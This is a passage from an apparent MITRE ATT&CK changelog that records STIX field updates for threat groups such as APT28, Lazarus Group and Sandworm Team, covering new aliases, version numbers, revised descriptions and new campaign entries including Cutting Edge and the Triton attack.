Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 4.0 | 5.0
iterable_item_added
STIX Field | Old value | New value
aliases | | Forest Blizzard
aliases | | FROZENLAKE
external_references | | {'source_name': 'FROZENLAKE', 'description': '(Citation: Leonard TAG 2023)'}
external_references | | {'source_name': 'Forest Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1006] Earth Lusca

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-17 19:51:56.531000+00:00 | 2024-04-10 21:38:24.226000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 2.0
iterable_item_added
STIX Field | Old value | New value
aliases | | Charcoal Typhoon
aliases | | CHROMIUM
aliases | | ControlX
external_references | | {'source_name': 'Charcoal Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'ControlX', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'CHROMIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023) (Citation: Recorded Future RedHotel August 2023)'}
external_references | | {'source_name': 'Recorded Future RedHotel August 2023', 'description': 'Insikt Group. (2023, August 8). RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale. Retrieved March 11, 2024.', 'url': 'https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0034] Sandworm Team

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-06 14:13:06.011000+00:00 | 2024-04-06 19:05:38.712000+00:00
x_mitre_version | 3.1 | 4.0
iterable_item_added
STIX Field | Old value | New value
aliases | | Seashell Blizzard
aliases | | FROZENBARENTS
external_references | | {'source_name': 'FROZENBARENTS', 'description': '(Citation: Leonard TAG 2023)'}
external_references | | {'source_name': 'Seashell Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

Minor Version Changes

[G0070] Dark Caracal

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-11 19:08:18.503000+00:00 | 2024-04-11 02:42:07.325000+00:00
x_mitre_version | 1.3 | 1.4

ics-attack

New Groups

[G1027] CyberAv3ngers

Current version: 1.0

Description: The [CyberAv3ngers](https://attack.mitre.org/groups/G1027) are a suspected Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated APT group. The [CyberAv3ngers](https://attack.mitre.org/groups/G1027) have been known to be active since at least 2020, with disputed and false claims of critical infrastructure compromises in Israel.(Citation: CISA AA23-335A IRGC-Affiliated December 2023) In 2023, the [CyberAv3ngers](https://attack.mitre.org/groups/G1027) engaged in a global targeting and hacking of the Unitronics [Programmable Logic Controller (PLC)](https://attack.mitre.org/assets/A0003) with [Human-Machine Interface (HMI)](https://attack.mitre.org/assets/A0002). This PLC can be found in multiple sectors, including water and wastewater, energy, food and beverage manufacturing, and healthcare. The most notable feature of this attack was the defacement of the device's user interface.(Citation: CISA AA23-335A IRGC-Affiliated December 2023)

Major Version Changes

[G0064] APT33

Current version: 2.0

Version changed from: 1.4 → 2.0


Old Description
[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

New Description
[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-03-08 22:07:25.123000+00:00 | 2024-04-11 16:06:34.700000+00:00
description | [APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017) | [APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.4 | 2.0
x_mitre_contributors[0] | Dragos Threat Intelligence | Dragos Threat Intelligence
iterable_item_added
STIX Field | Old value | New Value
aliases | | Peach Sandstorm
external_references | | {'source_name': 'Peach Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0082] APT38

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

New Description
[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2022-01-18 17:13:14.610000+00:00 | 2024-04-17 22:08:29.146000+00:00
description | [APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. | [APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
x_mitre_version | 2.0 | 3.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Sapphire Sleet
aliases | | COPERNICIUM
external_references | | {'source_name': 'Sapphire Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'COPERNICIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0035] Dragonfly

Current version: 4.0

Version changed from: 3.2 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-01 02:45:48.973000+00:00 | 2024-01-08 20:40:31.822000+00:00
x_mitre_version | 3.2 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Ghost Blizzard
aliases | | BROMINE
external_references | | {'source_name': 'Ghost Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'BROMINE', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0037] FIN6

Current version: 4.0

Version changed from: 3.3 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-03-22 03:50:17.471000+00:00 | 2024-01-08 22:13:27.588000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 3.3 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | TAAL
aliases | | Camouflage Tempest
external_references | | {'source_name': 'TAAL', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Camouflage Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0046] FIN7

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-04 18:10:49.054000+00:00 | 2024-04-17 22:09:41.004000+00:00
x_mitre_version | 3.0 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | ELBRUS
aliases | | Sangria Tempest
external_references | | {'source_name': 'ELBRUS', 'description': '(Citation: Microsoft Ransomware as a Service)'}
external_references | | {'source_name': 'Sangria Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references | | {'source_name': 'Microsoft Ransomware as a Service', 'description': 'Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/'}

[G0032] Lazarus Group

Current version: 4.0

Version changed from: 3.2 → 4.0


Old Description
[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).

New Description
[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-03-30 19:01:41.451000+00:00 | 2024-04-11 16:06:34.699000+00:00
description | [Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). | [Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 3.2 | 4.0
x_mitre_contributors[1] | Dragos Threat Intelligence | Dragos Threat Intelligence
iterable_item_added
STIX Field | Old value | New Value
aliases | | Diamond Sleet
external_references | | {'source_name': 'Diamond Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0049] OilRig

Current version: 4.0

Version changed from: 3.1 → 4.0


Old Description
[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

New Description
[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: Unit 42 QUADAGENT July 2018)
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-02-06 20:58:52.317000+00:00 | 2024-04-11 16:06:34.698000+00:00
description | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: Unit 42 QUADAGENT July 2018)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 3.1 | 4.0
x_mitre_contributors[2] | Dragos Threat Intelligence | Dragos Threat Intelligence
iterable_item_added
STIX Field | Old value | New Value
aliases | | Hazel Sandstorm
aliases | | EUROPIUM
external_references | | {'source_name': 'Hazel Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'EUROPIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0034] Sandworm Team

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-06 14:13:06.011000+00:00 | 2024-04-06 19:05:38.712000+00:00
x_mitre_version | 3.1 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Seashell Blizzard
aliases | | FROZENBARENTS
external_references | | {'source_name': 'FROZENBARENTS', 'description': '(Citation: Leonard TAG 2023)'}
external_references | | {'source_name': 'Seashell Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0102] Wizard Spider

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-09-12 14:35:52.920000+00:00 | 2024-04-03 20:21:34.872000+00:00
external_references[7]['description'] | (Citation: Secureworks Gold Blackburn Mar 2022) | (Citation: Microsoft Threat Actor Naming July 2023)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 3.0 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | DEV-0193
external_references | | {'source_name': 'DEV-0193', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

Minor Version Changes

[G1001] HEXANE

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-03-22 04:43:59.082000+00:00 | 2024-02-09 19:27:00.371000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.1 | 2.2

[G0088] TEMP.Veles

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-11-30 22:46:40.135000+00:00 | 2024-04-17 16:13:43.697000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4
x_mitre_contributors[0] | Dragos Threat Intelligence | Dragos Threat Intelligence

Campaigns

enterprise-attack

New Campaigns

[C0034] 2022 Ukraine Electric Power Attack

Current version: 1.0

Description: The [2022 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0034) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign that used a combination of GOGETTER, Neo-REGEORG, [CaddyWiper](https://attack.mitre.org/software/S0693), and living off the land (LotL) techniques to gain access to a Ukrainian electric utility to send unauthorized commands from their SCADA system.(Citation: Mandiant-Sandworm-Ukraine-2022)(Citation: Dragos-Sandworm-Ukraine-2022)


[C0032] C0032

Current version: 1.0

Description: [C0032](https://attack.mitre.org/campaigns/C0032) was an extended campaign suspected to involve the [Triton](https://attack.mitre.org/software/S1009) adversaries with related capabilities and techniques focused on gaining a foothold within IT environments. This campaign occurred in 2019 and was distinctly different from the [Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030).(Citation: FireEye TRITON 2019)


[C0033] C0033

Current version: 1.0

Description: [C0033](https://attack.mitre.org/campaigns/C0033) was a [PROMETHIUM](https://attack.mitre.org/groups/G0056) campaign during which they used [StrongPity](https://attack.mitre.org/software/S0491) to target Android users. [C0033](https://attack.mitre.org/campaigns/C0033) was the first publicly documented mobile campaign for [PROMETHIUM](https://attack.mitre.org/groups/G0056), who previously used Windows-based techniques.(Citation: welivesec_strongpity)


[C0029] Cutting Edge

Current version: 1.0

Description: [Cutting Edge](https://attack.mitre.org/campaigns/C0029) was a campaign conducted by suspected China-nexus espionage actors, variously identified as UNC5221/UTA0178 and UNC5325, that began as early as December 2023 with the exploitation of zero-day vulnerabilities in Ivanti Connect Secure (previously Pulse Secure) VPN appliances. [Cutting Edge](https://attack.mitre.org/campaigns/C0029) targeted the U.S. defense industrial base and multiple sectors globally including telecommunications, financial, aerospace, and technology. [Cutting Edge](https://attack.mitre.org/campaigns/C0029) featured the use of defense evasion and living-off-the-land (LoTL) techniques along with the deployment of web shells and other custom malware.(Citation: Mandiant Cutting Edge January 2024)(Citation: Volexity Ivanti Zero-Day Exploitation January 2024)(Citation: Volexity Ivanti Global Exploitation January 2024)(Citation: Mandiant Cutting Edge Part 2 January 2024)(Citation: Mandiant Cutting Edge Part 3 February 2024)


[C0030] Triton Safety Instrumented System Attack

Current version: 1.0

Description: [Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030) was a campaign employed by [TEMP.Veles](https://attack.mitre.org/groups/G0088) which leveraged the [Triton](https://attack.mitre.org/software/S1009) malware framework against a petrochemical organization.(Citation: Triton-EENews-2017) The malware and techniques used within this campaign targeted specific Triconex [Safety Controller](https://attack.mitre.org/assets/A0010)s within the environment.(Citation: FireEye TRITON 2018) The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.(Citation: FireEye TRITON 2017)

Minor Version Changes

[C0002] Night Dragon

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-22 20:45:42.479000+00:00 | 2024-04-11 00:36:23.822000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.2.0
x_mitre_version | 1.0 | 1.1

[C0022] Operation Dream Job

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-09-27 20:12:54.984000+00:00 | 2024-04-11 00:31:21.576000+00:00
x_mitre_version | 1.1 | 1.2

[C0016] Operation Dust Storm

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
